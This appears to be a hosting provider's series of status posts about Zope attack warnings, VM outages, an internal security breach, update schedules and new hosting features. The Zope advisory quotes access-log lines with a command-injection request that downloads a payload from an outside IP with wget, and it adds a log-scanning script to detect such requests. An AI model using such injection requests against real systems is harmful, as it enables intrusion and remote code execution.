gocept.net [en]

Attacks against Zope installations

We have seen intensified attack activity against Zope installations since 2011-12-26. The attacks focus on automatically exploiting the vulnerability described in CVE-2011-3587, for which a patch is readily available.

Please ensure that all of your Zope installations contain the latest security patches, since gocept does not take responsibility for patching user applications.

Suspicious activity leaves traces in access log files that follow a pattern like:

211.191.168.XXX - - [26/Dec/2011:22:18:00 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget%20--output-document%20/tmp/ieh1%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
211.191.168.XXX - - [26/Dec/2011:22:18:01 +0100] "GET //p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=lwp-download%20http://202.28.76.20/ieh1 HTTP/1.1" 200 154 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
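
To check your own access logs for such requests, a small script along the following lines may help. This is only a minimal sketch: it assumes the log uses the same format as the sample lines above, the function name `find_suspicious_requests` is made up for illustration, and the pattern only covers the request path seen in these samples, so other variants of the attack would not be caught.

```python
import re
from urllib.parse import unquote

# Assumption: this marker is derived from the two sample log lines only;
# real attacks may use different paths or parameters.
SUSPICIOUS = re.compile(r'"(?:GET|POST) [^"]*/os/popen2\?cmd=([^ "]*)')


def find_suspicious_requests(lines):
    """Yield (client_ip, decoded_command) for each matching log line."""
    for line in lines:
        match = SUSPICIOUS.search(line)
        if match:
            # The client address is the first space-separated field.
            client_ip = line.split(" ", 1)[0]
            yield client_ip, unquote(match.group(1))


# Example usage (the log path is a placeholder):
#
#     with open("/path/to/access.log", errors="replace") as log:
#         for ip, command in find_suspicious_requests(log):
#             print(ip, command)
```

A match only shows that a request was attempted. Whether it succeeded depends on the patch level of the installation.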

Hardware failure of a VM server

On Monday, 2011-10-31, one of our VM servers failed completely. This caused an unplanned outage for several customer VMs and our mail server mail.gocept.net. We were able to limit the total downtime by quickly migrating the affected VMs to other servers.
It is unlikely that any data has been lost. Please excuse the service disruption.

The server started to decline network requests around 15:30 CET. Our stand-by support team was alerted immediately. After we had come to the conclusion that we could not revive the hardware quickly, we began moving VMs to other servers at 16:15 CET. Around 16:45 CET, services were functional again.

Security breach on an internal system on 2011-10-18

On Tuesday (2011-10-18) at 22:45 CEST an attacker managed to gain access to one of our internal systems running, among others, the external service monitoring, the Redmine project management tool, and an internal mailing list server. The compromised system is not automatically managed.

Customer VMs were not affected.

We needed to take the machine partially off the network between Wednesday (2011-10-19) 13:20 and 21:00 CEST to perform an analysis and fix security holes. The above-mentioned services had only limited availability during this period. User-generated data has most likely not been compromised. We decided to take the machine back online to make the services available again as quickly as possible.

Nevertheless we will move the services to newly installed machines shortly and erase the compromised machine. We will review and improve our security practices to avoid similar incidents in the future.

Unplanned VM outage 2011-09-06 16:25-17:00 CEST

Unfortunately some VMs experienced an unplanned outage yesterday (2011-09-05) between 16:25 and 17:00 CEST as their root disks turned read-only.

To recover quickly from this state, we forcibly shut down the VMs and rebooted the associated KVM server. The VMs recovered fine after this reboot.

Owners of affected VMs have been notified individually directly after the incident.

It appears that we have hit a bug in our iSCSI initialisation code that caused all VMs on this physical host to lose connectivity to their storage server.

The issue was triggered while we were bootstrapping a new virtual machine.

The bug is currently undergoing further analysis and replication in our development environment and will be fixed soon.

For the time being, we have ceased to perform actions that trigger this bug and do not expect your VM to be affected by it again.

System updates between August 29th and September 2nd

We proudly announce that the pending system updates will be performed during the week of August 29th to September 2nd.

Stability issue resolved

The stability issue with our iSCSI storage server that required us to postpone the system update has been resolved. It was caused by an incompatibility between the iSCSI server software and Linux 2.6.39. We resolved the issue by selecting 2.6.38 as the new kernel version for this update instead.

Order of events

With the system update taking place next week, the order of events will be:

This week:

Announcement of general resource group maintenance settings by email
Announcement of specific maintenance windows for every VM by email

Next week:

Monday morning: update of infrastructure machines, watch for any deviations, fix last-minute bugs if necessary, no downtime expected. If anything goes wrong, this will be our chance to cancel any customer-affecting updates.
Monday evening: update of a representative set of machines including selected customer VMs.
Tuesday evening: initiate update on 20% of all machines
Wednesday evening: initiate update on 30% of all machines
Thursday evening: initiate update on the remaining machines
Saturday: reboot of all VM host machines

During the week we have also scheduled early-morning and late-night shifts of our support personnel. They will keep an eye on the services during and after the system update, fix any issues that arise, and contact you about issues that we cannot fix for you.

Please note that all VMs will be rebooted twice: once during their regular maintenance window to activate the new kernel and a second time on Saturday without a regular maintenance window due to the necessary restart of the KVM hosts.

Automatic maintenance scheduling

With the growing number of machines that we support in gocept.net, and the ultimate goal of providing a transparent, flexible, yet automated service, we took your feedback from the last months and implemented a better mechanism to support maintenance activities. It replaces the existing "automatic reboot" scheduler, which only paid attention to system load and did not communicate.

The new implementation allows any machine to queue "maintenance activities" like memory resizes, changes to the number of CPUs, kernel updates, or larger system updates. Depending on the settings of the resource group, our central directory is then able to automatically schedule a window for those activities and notify the machine of the time at which the activity should be performed.

Every resource group now has settings for:

your technical contact email addresses
your preferred timezone
a daily interval that can be used for scheduling regular maintenance automatically
how far in advance you need to be informed of any maintenance activity.

Every machine has an additional setting that controls whether this machine is allowed to automatically schedule new maintenance windows.
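
To illustrate how these settings could interact, here is a minimal sketch of picking the next maintenance window. It is not our actual scheduler: the class, its field names, and the function `next_window_start` are hypothetical, and the sketch only considers the start of the daily interval and the notice period.

```python
from dataclasses import dataclass
from datetime import datetime, time, timedelta, tzinfo


@dataclass
class ResourceGroupSettings:
    # Hypothetical field names modelled on the settings listed above.
    contacts: list       # technical contact email addresses
    tz: tzinfo           # preferred timezone
    window_start: time   # start of the daily maintenance interval (local time)
    notice: timedelta    # how far in advance the contacts must be informed


def next_window_start(settings, now):
    """Return the earliest daily window start that respects the notice period.

    `now` must be a timezone-aware datetime.
    """
    earliest = (now + settings.notice).astimezone(settings.tz)
    candidate = datetime.combine(
        earliest.date(), settings.window_start, tzinfo=settings.tz
    )
    if candidate < earliest:
        # Today's window would start too early; use the following day.
        candidate += timedelta(days=1)
    return candidate
```

For example, with a notice period of three days and a daily interval starting at 22:00, an activity queued on a Thursday at noon would be scheduled for Sunday at 22:00 in this sketch.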

To introduce this feature you will first receive individual emails for each resource group that display the values we used to initialize this for you. After preparing the full roll-out schedule for next week, you will then receive emails about the windows that we schedule for each individual machine.

More swap for small VMs

All VMs now get at least 1GB of swap space. This will help smaller VMs, which need to run the same memory-resident system administration tools as larger VMs; the kernel regularly swaps these tools out. This way you can make more effective use of the memory in smaller VMs without our system management getting in your way.

Multi-core VMs

Due to popular demand we are now introducing multi-core VMs: you can choose to run up to 12 cores per virtual machine.

However, we still recommend using the multi-core feature wisely: dividing up your application over multiple smaller VMs has positive side effects like load balancing and higher fault tolerance on the infrastructure level, and it ultimately scales to many more cores. It also usually means the setup of each individual VM is much simpler, more testable, and thus more maintainable. Also remember: the operating system for VMs is still 32-bit, so you're limited to a total of 4GB of memory in the VM and 3GB per process.

We will charge 25 EUR per additional core per month.

Software updates

The package catalog has been updated and now includes, amongst others, Linux 2.6.38, Python 2.5.4, 2.6.6, 2.7.1 and 3.1.3. A more detailed list of package updates is shown in our official ChangeLog.

To perform the package updates faster than in the past, we have improved our binary host system: packages are pre-compiled in our development environment and then pushed directly onto the data center mirrors. As we use a well-adjusted check-summing mechanism to ensure binary compatibility, the packages are already in the data center when the machines start updating.

CPU visibility

Do you wonder which CPU actually powers your VM? Running `uname -a` now shows the actual physical CPU identification instead of the generic `qemu virtual CPU`.

As we run a mixed environment that constantly gets updated, you might see different CPU models on different machines. If you think you could benefit from a better CPU, then drop us a note and we'll see whether we have some free space on a system with more power.
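
If you want to compare CPUs across several of your VMs from a script, the same information is usually available in `/proc/cpuinfo` on Linux. The following is a small sketch under that assumption; the helper name `cpu_model_names` is made up for illustration, and the `model name` key is the one used on x86 systems.

```python
def cpu_model_names(cpuinfo_text):
    """Return the 'model name' value of every CPU listed in the given text."""
    names = []
    for line in cpuinfo_text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "model name":
            names.append(value.strip())
    return names


# Example usage on a Linux machine:
#
#     with open("/proc/cpuinfo") as f:
#         print(set(cpu_model_names(f.read())))
```

On a multi-core VM the list contains one entry per core, so wrapping the result in a set gives the distinct models.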

New configuration schema for PostgreSQL 9

The PostgreSQL configuration schema has been adjusted by Gentoo to be more Unix-like: the configuration files are now located in /etc/postgresql-9.0 instead of /srv/postgresql/9.0/data.

More documentation

In case you haven't noticed: we have also silently been updating our gocept.net documentation to give a better overview of our architecture, help you get started and explain the typical tasks in our environment.

We're very excited about putting those improvements to good use and hope that they will further improve your experience of our hosting services.

Your gocept.net system administrators

System updates delayed

Unfortunately, the preparations for the system updates planned for next week have uncovered a stability issue in the storage system that might endanger the availability and reliability of your services.

Therefore we have decided to delay the planned update as long as necessary to provide a reliable solution.

We would like to reschedule the update as soon as possible but cannot give a specific date at the current time. However, we will inform you at least one week in advance, giving a detailed schedule.

We apologize for any inconvenience,
Your gocept.net system administrators

System updates August 15th–19th

We'd like to pre-announce a comprehensive system update of our hosting infrastructure in the week of August 15th–19th.

The update will require some downtime for all of our services. Details about the specific downtimes will be published separately.